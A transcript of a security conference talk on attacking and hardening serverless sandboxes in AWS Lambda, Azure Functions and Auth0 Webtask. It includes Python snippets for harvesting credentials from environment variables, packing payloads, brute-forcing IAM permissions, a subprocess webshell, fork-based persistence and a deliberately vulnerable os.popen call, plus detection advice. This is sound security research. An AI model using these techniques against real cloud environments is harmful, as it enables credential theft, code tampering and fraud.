
So let's talk about serverless compute. How many people use serverless compute in some form or another today? Wow, about half the room. If you don't use serverless today: we're talking about pure serverless offerings where you write some code, you upload it to a sandbox of some kind, you don't get a lot of visibility into how that code is executed, and you get the return value of that code. There are other things that people label as serverless, like SQS or S3; we're not talking about those. These are what people refer to as ephemeral runtimes, which means they sort of come into being, your code executes, and then that environment (sometimes it's a container) is gone shortly thereafter.

So why use the serverless thing at all? The primary reason most people go to serverless compute is actually parallelism, because in an environment like AWS Lambda you have more or less nearly infinite scale, fan-out-pattern-style programming is very easy, most programming models for it are event-driven, and you can hook automatic events up to other things in your cloud environment. In theory this has more security features than your standard thick server. High availability is really simple, largely because you as a consumer don't have to manage it. It has enforced architecture patterns and little to no management for your ops team.

Another way I like to put that, though, is that serverless is really hope-based computing, right? You're putting a lot of trust in the vendor to do all the right things, and I don't always necessarily like to trust vendors. We hope some set of things about these serverless environments; these are the rules of serverless that we believe should always be true. We hope our code executes securely. We hope that people can't tamper with the execution of that code. We hope that the vendor is patching the underlying operating system. We hope that our code hasn't been modified in transit to the sandbox. And we hope that this is somehow actually more secure than running our own servers, because maybe we're actually pretty good at that ourselves, sometimes.
So the things I hope you'll take away from this talk are: how different vendors implement their sandboxes (this is really isolation technology), attack patterns and techniques for persisting in various environments, and how to build your own test tools to hack around in the sandbox; that's the hacking part of the talk. Most importantly, I hope you'll walk away able to answer the question: should you use this at all, or should you avoid it entirely? Things you won't learn in this talk, because I didn't do them: kernel-level exploits, because I don't have any; you also won't see a container escape to the AWS hypervisor, because if I had done that I would be selling it somewhere and not talking here.

We'll look at some Python in this, because Python is the primary language I write in. We'll look at a little bit of Node.js, which makes me sad, and we'll also look at some IAM policy docs. A quick favor, though: you need to remember that when we talk about the initial attack vector for these environments, it's bad code. We assume some sort of contrived vulnerability initially to get into the environment, because we assume that at some point you will make a mistake, some bad code will get introduced into your environment, and you will have SQLi or an RCE. This happens despite your best efforts, all your static analysis, all your quality controls; someday it will happen to you. The question is how bad it gets: how dangerous is serverless compute when one of those RCEs is actually introduced?

Before we get into that, let's look at who sells the serverless thing. Everybody. Pretty much every vendor that has an interest in cloud has an interest in serverless, because all these vendors get together, they compete with each other, and they seem to think this is the future of the way we will interact with compute resources. Google Cloud has Cloud Functions, Azure has Azure Functions, AWS had the first offering to market with AWS Lambda, and IBM vends a project called Apache OpenWhisk.
Apache OpenWhisk is actually pretty neat, and then there are a couple of small vendors in the space, the most notable of which is Auth0, which has an engine called Webtask. So what do people use serverless for? Probably nothing critical, right? It's brand new, hasn't been around a long time. The answer is they pretty much use it for everything. On the low-risk side, a lot of Slack bots are written in serverless frameworks, and on the high-risk side you have things like Auth0, which uses the Webtask engine to provide OpenID Connect and SAML authentication for consumers and their public and private cloud environments. While I was working on this talk, my boss tweeted at me that somebody had actually figured out how to run Docker containers in userland inside of Lambda as well. That's kind of the moral of the story here: if you can figure out a way to misappropriate a technology to do a thing, you can do it. My response to that was: why would you even want to? Because I think we frankly already have enough abstraction in these environments from an auditing and DFIR perspective: we now have containers running in serverless sandboxes, running in sandbox containers, running in virtual machines, on compute hosts, all in the cloud.
As somebody who started their career in DFIR, this makes me nervous, and I can't imagine why. When I started working in IT, this is what a server looked like: you know, kind of like C-3PO, and sometimes when they misbehaved you turned them off and on again. This is loads more complex, so I wanted to know: what is the attack surface of these things, really, and when they're breached, what are the potential pivots and persistence methods?

The attack surface is primarily in two places: at code execution time, and in the code pipeline, which is a code-corruption-style attack. We aren't going to talk much about the code pipeline attacks, because if you can own the code where it lives, in GitHub or something, you pretty much own the environment anyway; that's not very interesting. But I do want to mention it, because there's a hot topic in infosec right now, this concept of subdomain takeovers. This is largely because of the way technologies like Amazon S3 work: you might go allocate an S3 bucket to do a thing, the name might be abcxyz.com, and if you delete that bucket, somebody can immediately reallocate it with the same name. If you were storing source code in there, with some other set of things chained to it, they can potentially pollute your deployment pipeline inside the confines of their own account. This is a problem when you publish all your code totally in the open, and these kinds of attacks really do happen in the wild.

The other way you can attack this is at runtime, which is far more interesting. In this diagram I have a web app represented: you're actually attacking through Amazon API Gateway into the Lambda sandbox, and then, depending on how lax the IAM policies are (and we know that people are bad at AWS IAM; they're getting better, but it's still really hard), you can pivot to other things in the environment from that sandbox.
Maybe that's not very interesting on its own; it's all the usual attack techniques. But it is interesting because people are forklifting existing application workflows, similar to when we made the transition from data center to EC2 initially. Now we're making a transition away from EC2, and we're taking those apps, much like we did with Docker containers, and shoving them into serverless, so maybe there are some unique considerations here that we need to know about. There are two things we're primarily concerned with when we talk about attacks on serverless environments, and they're persistence and data exfiltration. This goes back to all the things we hope are true about serverless compute, the most notable of which is that we believe, as consumers, that these sandboxes get thrown away at the end of their life. We have to be able to take it to the bank that this happens in order to trust the environment. We also believe, because these are serverless, that they have maximum execution runtimes, and that should always be true too. In AWS Lambda the limit for code execution is five minutes; it's supposed to be five minutes, and if your code runs five point zero one minutes it should die, whether it's done or not, and then it should go away. But five minutes is a lot of time if you have the right type of attack; you can do a lot of things in an environment programmatically in five minutes, and that's an issue.
Before we dive into what those things are, let's talk about a couple of other terms. Term number one is cold start. This is what happens when you first execute some code inside a serverless environment: the provider (Amazon, Azure, GCP) has to allocate some compute resources to you, and they have to stream your code down to that container and load it. This takes a little bit of time, roughly a half-second penalty each time you have a cold start. So providers introduced a feature called warmness in the name of performance: if you invoke a function multiple times, that code will actually stay on the compute host that was executing it, and on subsequent executions, if they happen within a certain time window, you may or may not be returned the same container. You can kind of see where I'm going with this, maybe. The first person to talk about this warmness-versus-cold-start concept was Rich Jones, who writes a serverless framework called Zappa. Zappa pretty much allows you to take a Flask app or a Django app and more or less forklift it into AWS Lambda without having to modify the underlying application. He was doing a lot of work in Lambda, and he gives a great talk called Gone in 60 Milliseconds about data exfiltration; you should check it out, I linked it in the slides.
So these environments have two attack surfaces: an outer attack surface and an inner attack surface. On the outer side we have AWS API Gateway. This is kind of a black-box reverse proxy; you don't really get a lot of visibility into how it does what it does, it costs four dollars a month to have in your environment, and it hooks up all of the routes to the underlying application. On the inside you have the actual AWS Lambda functions, and under that you have some set of other services, which are the chocolatey center: as an attacker you want to go take over those other services for your exfiltration or persistence.

When you're scanning for these things in the cloud, the way you identify that something is a serverless app might be based on things like HTTP headers. There are some giveaways that something is running inside AWS Lambda. It isn't a smoking gun necessarily, but you can look for the header X-Amz-Cf-Id, which pretty much indicates that something is coming from CloudFront; API Gateway also discloses that information, so you can say maybe this is Lambda. On the Auth0 side of things, the Webtask engine actually identifies itself as Webtask in a header. On the Azure side it's just IIS, so we don't actually get any disclosure; maybe it's intentional, maybe it's not, but no smoking gun there.

You can also do some recon on GitHub to see what apps are being deployed in serverless. There's a popular framework called the Serverless Framework (surprise), and it has a config file, serverless.yml. You can see there are quite a lot of results, and you can dig in and see how people are constructing their apps and where they're deploying them. So when you find the serverless apps, what do you do with them? I didn't know the answer to that, so I wanted to dig around.
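As a sketch, the header heuristics above might look like this. Only the X-Amz-Cf-Id check comes straight from the talk; the exact Webtask and IIS header shapes here are my assumptions, and none of this is a smoking gun:

```python
def guess_serverless_backend(headers):
    """Rough fingerprint of a serverless backend from HTTP response headers.

    Heuristics only: X-Amz-Cf-Id means the response came through CloudFront
    (which fronts API Gateway), a 'webtask'-flavored header suggests Auth0,
    and a Microsoft-IIS Server header is merely consistent with Azure.
    """
    h = {k.lower(): str(v).lower() for k, v in headers.items()}
    if "x-amz-cf-id" in h:
        return "maybe AWS Lambda (behind API Gateway / CloudFront)"
    if any("webtask" in k or "webtask" in v for k, v in h.items()):
        return "Auth0 Webtask"
    if "iis" in h.get("server", ""):
        return "maybe Azure Functions (no smoking gun)"
    return "unknown"
```

In a scan you'd feed it the response headers from a simple HEAD request against each target.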
I wanted to see what was possible inside each execution environment, so I went and looked at the vendor docs to see if any vendor was super transparent about the way they allocated resources and put together their sandbox environments, and I didn't really find anything. Most vendors consider their serverless technology to be super-secret proprietary sauce. They won't even say it's a Docker container, but we can know it's a Docker container by poking at it a bit and seeing if it behaves like one, because if it looks like a duck and it quacks like a duck, it's probably a duck. I personally have a problem with using things I can't understand, which is why I love open source software: I can always rip open the code and know how it works. So I started writing some code in Python that I would deploy into these environments, code that would literally run OS shell-out commands and learn things about the environment. This was based on another project by a guy named Eric Hammond, who wrote a web shell wrapper in Node.js that executes bash commands. I kept evolving this until I had a bunch of checks that would more or less try to learn all the things about the environment: was it Linux, what was the kernel version, what kind of processors did it have, how much memory, if it was Python what were the Python packages and their versions and are they up to date, how long was the host alive, how long was the container alive, what's the networking like, can I exfiltrate data through a NAT gateway? So I built up all these checks. Here's the list of things I primarily wanted to know, based on an analysis of that data: is this a regular operating system, like RHEL or CentOS or Windows? If so, are the general things about that OS true, or has it been modified by the vendor in some proprietary way to make it more secure? That led me to ask: can I read and write everywhere in the operating system? If I can, can I poison my code via an RCE? Can I modify the actual code that's loaded into the runtime? Can I get and set environment variables? Are the permissions in the cloud too permissive, or just right? And what about internet egress? Because if I get any internet access at all, that makes it really easy to do one data burst of whatever I've got, make that hard to detect, and slip away with lots of great data. This is a little bit like playing Operation in the cloud, right?
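A minimal sketch of that kind of shell-out recon wrapper. The specific probes here are my own picks, not the talk's full check suite, and inside a real sandbox some commands will simply be missing or blocked:

```python
import platform
import subprocess

def sh(cmd, timeout=5):
    """Shell out and capture whatever comes back; failures are data too."""
    try:
        r = subprocess.run(cmd, shell=True, capture_output=True,
                           text=True, timeout=timeout)
        return (r.stdout or r.stderr).strip()
    except Exception as exc:
        return "probe failed: %s" % exc

def recon():
    """Collect a few facts about the runtime, in the spirit of the talk's checks."""
    return {
        "platform": platform.platform(),
        "kernel": sh("uname -r"),
        "user": sh("whoami"),
        "uptime_seconds": sh("cat /proc/uptime"),
        "mounts": sh("mount | head -5"),
    }
```

The result would then be serialized to JSON and carried out in the function's response body.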
So I totally don't advise that you do this until you've had a frank conversation with your vendor about the fact that you're going to audit their environment, because depending on what you're doing and which vendor it is, you will trigger their automated abuse protections and you'll get a kind of cease-and-desist notice. I worked with Azure and AWS and Auth0 pretty tightly during this project, so if you're interested in doing this, I can connect you with the right people. I looked at Lambda, Azure Functions, and Auth0 Webtasks, and I'm actually in the process right now of doing the same for Google Cloud Functions, but that data will not be publicly available until January; if you follow my website you can get it at the end of the year.

Let's talk about Lambda first, because Lambda is kind of the easiest; it's the longest-lived serverless runtime. We know a few things from the research of other people, not necessarily from public vendor docs: it's some kind of container-based system; it runs on Amazon Linux (big surprise there; Amazon Linux is just a RHEL derivative); it has a read-only file system; code is injected into /var/task; code executes as a non-root user; there's a single AWS IAM role accessible to the sandbox; and reverse shells are not possible because of AWS NAT gateway magic. Somebody tweeted at me to correct me on that last point: there is a way to get reverse shells in Lambda, but it assumes a lot of custom configuration and it's really hard, so I'm going to stand by the statement that under normal circumstances you can't get reverse shells in Lambda. You can get internet egress, though, and in some cases your functions have internet egress by default. So I wanted to know: could I steal the credentials, were the credentials inside these functions special in any way, and if I steal them, how bad does it get? Where can I persist code when I do attack it, and how long can I persist it?
Can I also get Lambda to do things other than execute code in the language I prefer to use? That's kind of a two-stage attack: I get an RCE, I stream down an arbitrary binary that maybe does some nastier things; should Lambda prevent the execution of that? And lastly, how frequently does the OS get patched? Because we know patch management is kind of a hot topic, because Equifax. I won't dive into the sample output here, because the internet access in this room is really terrible and frankly I'm terrified to leave my slides, but the output is a blob of descriptive JSON; just picture the most descriptive JSON about the sandbox that you can think of.

This is what the container structure looks like from my analysis of that JSON: it's just a regular Linux file system, connected to AWS API Gateway, that code streams down into. There's a magic file in there that nobody talks about, called bootstrap.py, which has tons of juicy stuff I could have spent a long time analyzing: it's how Amazon does X-Ray, it's how they talk to other proprietary things in Amazon to instrument the container, and lastly it's how they hook up the runtime, whether that's Python or Node.js. So that file is kind of interesting; you can dig into it. There's also an awslambda runtime directory, and then down at the bottom there's only one writable directory in the whole thing, which is /tmp, and it's actually a RAM disk. If you slide the little slider in Lambda and allocate 512 MB of RAM, it will actually make a /tmp partition that's 512 MB, and that's the only place in the container where you can persist. Then, on the side, there's how the credentials are delivered. Some things in AWS use the metadata service, which, if you're familiar with it, spins up a web server on 169.254.169.254; these functions don't have that, you can't access the metadata service. All the creds are delivered as environment variables, and they're just temporary session tokens that are valid for an hour. That's how the creds live in the container.
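Harvesting those env-var credentials from inside an RCE is nearly a one-liner; the variable names below are the standard ones Lambda sets:

```python
import os

def harvest_lambda_creds(env=None):
    """Grab the temporary STS session credentials that Lambda injects as
    environment variables (they're only valid for about an hour)."""
    env = os.environ if env is None else env
    wanted = ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN")
    return {k: env[k] for k in wanted if k in env}
```

An attacker would stuff the result into a local boto profile, exactly as shown later in the demo.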
Given these limits, because the attack surface is really, really small and the container is really, really limited, as an attacker you can laser-focus on how you're going to design a piece of serverless malware. Your initial payload needs to be as small as possible, because maybe you can only get it into the sandbox via API Gateway, and there are maximum sizes for GET, PUT, and POST requests. You potentially need to persist it in /tmp, and /tmp is really small: maybe 512 MB in a lot of cases, maybe 128 in others. From inside your malware, you need to be able to assess lateral movement in the environment as fast as you can; if you can't pivot, you need to just die, because maybe you're going to be detected. And you need to exfiltrate your results somewhere else as quickly as you can, before the container exits and dies. In other words, your attack needs to be bigger on the inside.

There are some great ways to do this in Python. Python minification is a thing: you can write Python and run it through a Python minifier, which basically takes all of your Python, cross-compiles it into totally non-human-understandable Python lambda statements, and smashes all the whitespace out of it. That's one way to get your Python really small, and it even supports inline compression. Then, when you're building your Python to do reconnaissance, you probably want to know what you can do. Inside AWS Lambda you get the boto3 library for free, which is the AWS interface to all of its APIs. So here's an example of how you might write some Python that would brute out whether the function has permission to create CloudWatch log groups, which is probably a great way to exfiltrate data if you can do it: just create a CloudWatch log group, put your stolen data to CloudWatch Logs, and then pick it up later from some other service or a subsequent execution of the function. I wrote a bunch of samples of this, and there's a GitHub gist with the reconnaissance script I used. There's also a Python module called onelinerizer that will take any Python script and turn it into one totally unintelligible line. This works great if you want to make your payload smaller. I didn't make serverless malware that I can share with you, but boy, that sure would have been cool; maybe next year. So in summary, you have these techniques, with lots of payload packing, and if I were writing serverless malware, that's probably how I'd do it. Instead I decided to build an app that was horrible and just attack it by hand: I wrote a Slack bot, because we use Slack for a lot of things.
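Before the demo, here's the payload-packing idea from a moment ago as a stdlib-only sketch. This is not the real minifier or onelinerizer, just the same spirit: squeeze a whole script into one compressed, self-decompressing exec() line:

```python
import base64
import zlib

def pack(source: str) -> str:
    """Compress a Python payload into a single self-decompressing line."""
    blob = base64.b64encode(zlib.compress(source.encode())).decode()
    return ("exec(__import__('zlib').decompress("
            "__import__('base64').b64decode('%s')))" % blob)
```

The output is one line of ASCII that fits more easily inside whatever request-size limits the front door imposes.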
That Slack bot's primary job was to take a webhook from GitHub, send a notification to a channel, and then allow a user to ask the Slack bot questions about commit messages. But I put a vulnerability into that Slack bot that allows you to do a string escape and execute arbitrary code, and I have a little demo of that. This is what the normal behavior looks like, and this is what the bad behavior looks like: you can see I have the Slack bot sort of vomiting creds back into the channel from some code injection, and you can escalate that behavior, but the video tells the story a little bit better.
So let's fast-forward to the juicy stuff. This is me making fun of my co-presenter at Black Hat in the Slack channel while I'm performing the attack. There's the commit message that says, hey, somebody committed some stuff to GitHub; this is normal behavior. You can ask it to go get the changelog for you, and you can inline a file name between some sort of templating-style delimiters. So this is me asking it to do the regular thing, go get the changelog and copy it into the channel, and look, there's the changelog. That was ASCII Star Wars, but Slack does not honor ASCII, so this is just me validating that it actually did go out and get the changelog. Again, me making fun of my co-presenter. And there's the vulnerability: it calls os.popen and does a shell-out instead of using native Python read facilities, so, kind of unsafe.
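Roughly, the vulnerable pattern looks like this (a reconstruction, not the bot's actual source): user input flows straight into os.popen, so anything after a semicolon runs as a shell command, while the native-read version never consults a shell at all:

```python
import os

def get_changelog_unsafe(filename):
    # Vulnerable: filename lands on a shell command line, so a value like
    # "CHANGELOG.md; env" happily dumps the environment (and the AWS creds).
    return os.popen("cat " + filename).read()

def get_changelog_safe(filename):
    # Safe: native Python file I/O; no shell ever sees the user input.
    with open(filename, "r", encoding="utf-8") as fh:
        return fh.read()
```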
So this is me inlining just the ls command in there to validate that it actually works, and boom, yay, I know I can do stuff. So now what else can I get? Lots of juicy stuff, maybe. Am I root? Definitely not root; I'm an sbx user, which is the regular user for AWS Lambda, a dead giveaway. I know from other research that environment variables are where the creds live, so I grab the creds. Then I want to know things about those creds, so I copy them into my regular boto profile, and once they're in my regular boto profile I try to call S3 with them, and I can't, because this app has a hardened IAM policy; but this validates that the creds do work outside the sandbox. I can know who I am, and then I can run Daniel Grzelak's aws_pwn to see all the other stuff I can do. That's a script you can run locally that will brute out all the permissions, more or less, by just trying every permission in every service, one at a time, and recording whether it was authorized or unauthorized. Now, that's a really noisy, very stupid attack if you actually care about somebody not noticing you, but you can do that.
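That brute-out loop reduces to "try a call, classify the exception." A generic sketch of the idea: the boto3 call in the docstring is illustrative (the log-group name is made up), and matching on AccessDenied in the message is how boto3 usually surfaces a denial:

```python
def probe(action):
    """Attempt one API action and classify the outcome instead of crashing.

    `action` is any zero-argument callable, for example:
        lambda: boto3.client("logs").create_log_group(logGroupName="exfil")
    (that log-group trick is the CloudWatch exfiltration path from earlier).
    """
    try:
        action()
        return "allowed"
    except Exception as exc:
        return "denied" if "AccessDenied" in str(exc) else "error: %s" % exc

def brute(actions):
    """Run a dict of named probes; very noisy, exactly as noted above."""
    return {name: probe(fn) for name, fn in actions.items()}
```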
You can also get artifacts out. This is me basically proving that you can post to other places on the internet: I wrote a test to see if I could create log streams and then report the status back to yet another serverless function, so I'm using serverless to collect data about hacking serverless. It's serverless inception. The attack surface for these kinds of attacks becomes larger with bad IAM, and the issue here is really frameworks. This is new technology, and we're still building a lot of custom tooling to make it easy for developers to interact with it; a lot of the frameworks, like Zappa and the Apex framework, do not generate good IAM policies. This is the default policy of a Zappa deployment, and if you know much about AWS policies (maybe you don't know much about AWS policies), all you really need to know is that the more stars there are, the worse it is, and this has a lot of stars. The IAM struggle is really, really real; my boss likes to say that IAM in AWS is both the killer feature and the feature that kills you.

Detection is also kind of difficult here. On premise, we have a lot of mature facilities for seeing whether our environment has been breached: we have network taps, we have auditd, we have syslog shipping and other SIEM functions. In the cloud, we basically have CloudWatch Logs in AWS, plus whatever we do to instrument our own applications.
So if I have one piece of advice about this, it's that if you're designing an application for serverless, don't leave your time machine in the garage: make really heavy use of CloudWatch Logs, and actually have developers write sane logging into the app that proves it's behaving normally, because you don't really have a ton of native instrumentation in the environment. Oh, and I did my demo early for the bad Slack bot app, so just pretend it happened here and everything went really smoothly. When I did that demo of the Slack bot app, I had CloudWatch Logs turned on.
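What that "sane logging" advice might look like in a handler; a hypothetical sketch (the field names are mine), emitting one structured line per invocation so CloudWatch Logs has something to prove normal behavior against:

```python
import json
import logging
import time

log = logging.getLogger("app")
logging.basicConfig(level=logging.INFO)

def handler(event, context=None):
    """Hypothetical Lambda handler that logs one structured summary line.
    Anything logged to stdout/stderr lands in CloudWatch Logs automatically."""
    start = time.time()
    result = {"ok": True}  # ... the real work would happen here ...
    log.info(json.dumps({
        "event_keys": sorted(event),  # shape of the input, not its contents
        "duration_ms": round((time.time() - start) * 1000, 3),
        "outcome": "success",
    }))
    return result
```

A line like that per invocation gives you something to baseline; injected shell commands or weird inputs stand out against it.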
You can see that some abnormal things end up in CloudWatch Logs when I'm using them; there are definitely lots of great indicators of compromise for the environment here. Besides the fact that I had shell commands showing up in my CloudWatch Logs, I had anomalous execution times for those functions. One of the things CloudWatch gets natively is the execution time a function took, so you can in some cases average that and know whether an invocation is within a standard deviation of the mean; anything outside of, you know, maybe 1.25 standard deviations should trigger an alert. High error rates are a dead giveaway that something's gone wrong, and in CloudTrail, high denial counts for the role in Lambda are another smell test that somebody might have exfiltrated some credentials and is doing bad things. This is what the CloudTrail event looks like for a deny. CloudTrail deny events do not surface in the regular AWS CloudTrail interface; you don't see them unless you look at CloudTrail in CloudWatch or you look at the raw data. A lot of people I talk to don't even know that CloudTrail logs denials, but it totally does, and you can use this. So the bottom line about Lambda is that it's only as bad as your IAM policies.
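The execution-time heuristic described above is just mean and standard deviation over the durations CloudWatch already records; a sketch using the 1.25-sigma threshold from the talk:

```python
from statistics import mean, stdev

def anomalous_durations(durations_ms, threshold=1.25):
    """Return invocation durations more than `threshold` standard deviations
    from the mean; these are candidates for an alert."""
    if len(durations_ms) < 2:
        return []  # can't compute a sample standard deviation
    mu, sigma = mean(durations_ms), stdev(durations_ms)
    if sigma == 0:
        return []  # perfectly uniform timings: nothing to flag
    return [d for d in durations_ms if abs(d - mu) / sigma > threshold]
```

In practice you'd baseline on a window of normal invocations rather than the batch being tested, but the arithmetic is the same.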
You can detect attacks through CloudWatch log delivery, but your mean time to respond is about seven to ten minutes in a best case, because of the way CloudWatch logs bubble up in the environment.

Now let's talk about Azure Functions. Azure, unsurprisingly, runs on Windows. It has sets of functions grouped within what they refer to as apps. Because it is Windows, and Windows is built in a very specific way, the file system in these is largely writable. It does not have internet egress. Everything runs as non-root, all functions in the same app share a system, or tenant, and all functions in the same app execute as the same user. App code is loaded onto an attached drive called D:, and code gets injected into wwwroot, unsurprisingly. Some secrets are stored under data/Functions/secrets, and that's going to come into play later in how Azure sort of mismanages those secrets. So I wanted to ask the same questions I asked about Lambda, and since all these functions, unlike Lambda, get deployed onto the same tenant, how could I use that functionality to do bad things to a single app? A couple of other tidbits Azure does publicly disclose: you don't get WMI access, and Get-EventLog -List does return objects, but not in the way you'd think; they actually send all the Windows event logs to /dev/null, for some reason.
In digging around, I used the same programmatic shell wrapper as before. It's a less ephemeral system, which means I potentially have more tools at my disposal. Azure does open-source this sandbox, to its credit; it's available, but the Microsoft Developer Network documentation doesn't actually say so. They open-source it under the name Project Kudu, and they don't really marry those docs together to make it easy for you to know. You can run PowerShell in the environment, and we all know infosec people love PowerShell; that greatly reduces the pain of understanding how the environment is put together. To demonstrate this, my colleague and co-presenter, who is not here, created a vulnerable app concept that was supposed to be a credit card matching API, and it does very much work like a credit card matching API. It's composed of a few different single-responsibility functions designed to do things like accept credit card numbers, charge someone, and then bill them at the end of the month. It's written in Node.js, and we introduced a little vulnerability that allows you to execute some arbitrary code and get a function to return before it's intended to. To Azure's credit, when a function does return early, it raises a red flag in the log, but it still executes all the way to completion. Here's the indicator that a function has returned early; it'll say: "Error: 'done' has already been called. Please check your script for extraneous calls to 'done'." That is a smoking gun: it means somebody got RCE in your function. If you're a visual learner: all the functions live on the same tenant, and any function inside that tenant can, by default, list all the functions that run on the tenant. So immediately, if you gain a foothold in a low-privilege function, you have API access to know what the other functions are. You can also change API keys from inside one function for any function on the same tenant, so this is bad.
You can change the triggering methods of other functions, too. Let's say you have a credit card matcher app where some of the things are event-based from a REST API, and you have a billing function that's supposed to send bills out every month: you can change that billing function to run on an event trigger instead, or run every minute. And lastly, which I'll show you in my demo, you can actually, from a low-privilege function, poison the code of a higher-privilege function. I think I'm running a little behind here, so I'm going to skip to the juicy stuff, which is changing the source code of the function. Here we go; internet access is hard; oh yay, there we go. What you're going to see on screen, before I actually click the play button, is a POST with curl that will cause the billing function to say that my credit card bill, instead of being the normal charge, is one dollar. The way it will do that is by hitting a low-privilege function with an RCE: it will list all the functions, it will ask for the API key for the high-privilege billing function, and that API key will be encrypted. But since all the functions run on the same tenant, and Azure is perhaps not as mature in their IAM model, I can actually just very nicely ask the Azure key-management service to decrypt that API key for me, and it will return me the key, and then I can use that to access the high-privilege function. When this happens, even though it will be unsensational, you need to clap for my co-presenter, who is not here. There it goes: I've got the bill back, now I'm going to patch the billing code to always return one dollar, and then I'm going to ask it what the charge is at the very end, and it should say one dollar. So yes, the bill on the left there, for card 1234 5678 9012 3456, is now one dollar, and the other charge has been moved to another credit card number. All of the code for this is totally public, by the way, so you can deploy it in Azure and play around with it yourself if you want to test the IOCs or the API key thing.

All right, moving right along. Takeaways from that: having separate API keys is great, but once you're in one function you have access to all the other API keys, so you might as well not have many; it's only inconvenient for you. Be aware of the choices you're making by putting functions in the same app.
app. I actually think this is a bad piece of advice that's given for a feature that was intended to work this way: the default blueprint is for all your functions to deploy in one tenant. If you want to work around this, don't deploy all your functions in one tenant if they have separate security boundaries. You can make this secure; it's not that hard, it'll just cost you more money. But when you're talking about running functions for a fraction of a cent, if it costs you 0.0002 instead of 0.0001, who really cares? So the last vendor I'm going to talk about is Auth0. Auth0 Webtask is probably the smallest runtime I looked at. Webtask is, to Auth0's credit, totally open source. It runs in Docker containers on CoreOS; they are very transparent about that. It allegedly runs Node.js only. There's no restriction on internet egress, and that's because of the nature of how Auth0 works: they are an identity provider, and it would be very hard for an identity provider to have compute environments that could not talk to other things on the internet. It's used inside of the Auth0 rules engine and lots of other stuff, like GitHub webhook based applications. It has public and private tenants, and you can give them lots of extra money to run your own instance of it. So at first I thought, oh man, it runs Node.js, I have to re-implement all my code that mines the sandbox in Node, and that sucks. But then my coworker actually figured out that you could circumvent the native sandbox protection that prevented you from calling other things by just launching subprocesses. And so, yay, he wrote a webshell for me to use. His Twitter handle is kangsterizer, and if you think this is cool you should go follow him on Twitter, because he tweets about lots of other neat things. He's French (that's a French name, by the way; I won't even try to say his actual name, it's Guillaume). And so that's the output of the webshell running inside the sandbox.
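The subprocess bypass can be sketched in a few lines. This is an illustration only, not Auth0's actual runtime API: the point is that even when a sandbox filters what the host language can call directly, any reachable process-spawning primitive gives you a generic shell around that filter.

```python
import subprocess
import sys

# Illustration of the webshell idea: forward an arbitrary command to a
# child process and hand back its output. The in-language sandbox never
# sees the "forbidden" calls, because they happen in the child.
def webshell(cmd):
    """Run a command in a subprocess and return its stdout."""
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=10)
    return result.stdout

# Proof of life from a subprocess the sandbox did not intend to allow.
print(webshell([sys.executable, "-c", "print('hello from a child process')"]))
# prints "hello from a child process"
```

The original bypass was in Node.js (via `child_process`); the mechanism is identical in any language that leaves a spawn primitive reachable.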
And so now I didn't have to do much, right? Because I could get the sandbox to do whatever I want. I could also run Python in the sandbox, so once I could exec child processes, I pretty much found out I can do all the things. We found a couple of other things while digging around in here, one of which is a raw socket that's mounted inside the container as a shared Docker volume, and that was interesting. So I'm going to show you a quick process demo. This demonstrates that Auth0 does not follow one of the rules of sandboxes, which is that we believe a sandbox dies at the end of its maximum execution time.
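That rule is easy to check empirically. A minimal sketch, assuming (as in the talk's profiling work, though this exact marker path and function are mine for illustration) that files written to /tmp survive in a reused "warm" container:

```python
import os
import time

# Hypothetical marker path: if the file is already there on a later
# invocation, this "ephemeral" environment outlived a previous run.
MARKER = "/tmp/.sandbox_freshness_marker"

def invocation_is_warm():
    """Return True if this environment has served an invocation before."""
    warm = os.path.exists(MARKER)
    if not warm:
        with open(MARKER, "w") as f:
            f.write(str(time.time()))  # record first-seen time
    return warm

print("warm container" if invocation_is_warm() else "cold container")
```

Invoke the function twice in quick succession: a well-behaved sandbox that truly dies between runs would report "cold container" both times.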
I lost my Webtask session. That is definitely not webtask.com. We are so lucky that that was a benign site.
the tubes are slow today
So it has a nice IDE (you know, I'm sort of dancing up here waiting for this to load), or you can just write the Node.js right in the browser. All right, so now we can pass arbitrary arguments. If I type something that forks a process to the background, like something that pops the Python interpreter, the sandbox will just stick around on the tenant until another process comes and sweeps it away. So just by forking a process, I can keep this container alive longer than the intended execution period, which is lame.
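The keep-alive trick can be sketched like this: the "function" returns, but a background child it spawned keeps the container occupied past the intended lifetime. The handler and sleep duration here are made up for the demo.

```python
import subprocess
import sys
import time

# The "function" finishes immediately, but it leaves behind a detached
# child process that the sandbox's reaper was supposed to prevent.
def handler():
    child = subprocess.Popen(
        [sys.executable, "-c", "import time; time.sleep(30)"],
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    return child  # returned only so this demo can inspect the child

lingering = handler()
time.sleep(0.5)                  # the handler itself finished long ago
print(lingering.poll() is None)  # True -> the forked process still runs
lingering.kill()                 # clean up for the demo
```

In a sandbox that enforces its execution limit, that child would be killed along with the invocation; here it just sits on the tenant.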
Sometimes this works and sometimes it doesn't, running ps, because it associates something with my IP... there. So that's proof: two tabs, Python still running. If I just sit here and refresh... ah, that one died. So maybe they've improved this, but if you watch the Black Hat demo, this totally works, I swear. All right, Auth0 learnings (I lost my slide there for a second; it came back): forked processes hang the container. There's a back-channel socket that is a REST endpoint, likely for credential exchanges during auth; I didn't poke at that too much. The sandbox is escapable to the container. The sandbox system is Debian with little anomaly detection or monitoring: during the entire time that I did super noisy things in here, including running several Docker exploits, I didn't trigger their automated
protection, which is a little unsettling. And so I decided to start a project to put all of this data, all this profiling, together. That's the Serverless Showdown project, which is all those things I gathered with Python, lots of tests. It matters because, as consumers, we need to know when the environment changes. We need to know how often the vendor patches, because there's no such thing as a patch feed for serverless sandboxes, and it allows us to keep the vendors honest with us as consumers. Sometimes it'll even give us clues when new features are coming, because you'll see new environment variables for services still under NDA popping into these containers before they're actually publicly released. I don't know how you could use that financially... profit? So I decided to make a project called the Serverless Observatory. At Mozilla we love things that do observatory stuff; this is not a Mozilla project, but we have the Web Observatory, and it inspired me to make the Serverless Observatory, which is still not done, by the way, because I am a busy guy. But if this is something you're interested in being a first-time or many-time open source contributor to, I would love to collaborate with you. It's a project with an API that allows you to sign up and send profiles to it, and then it will run a bunch of tests on the profile and score the serverless sandbox. I made this in an abstract way so that it can run in any container environment, so you could really use this to test any serverless engine out there and get back an A through F grade based on some opinions that I have, which are actually derived from the Docker CIS Benchmark. If you think this is cool, sign up for my mailing list on threatresponse.cloud; that's my website for the open source project that I presented here last year and the year before. So how did the security features stack up across vendors? This is a cool slide to tweet. This is how all the vendors
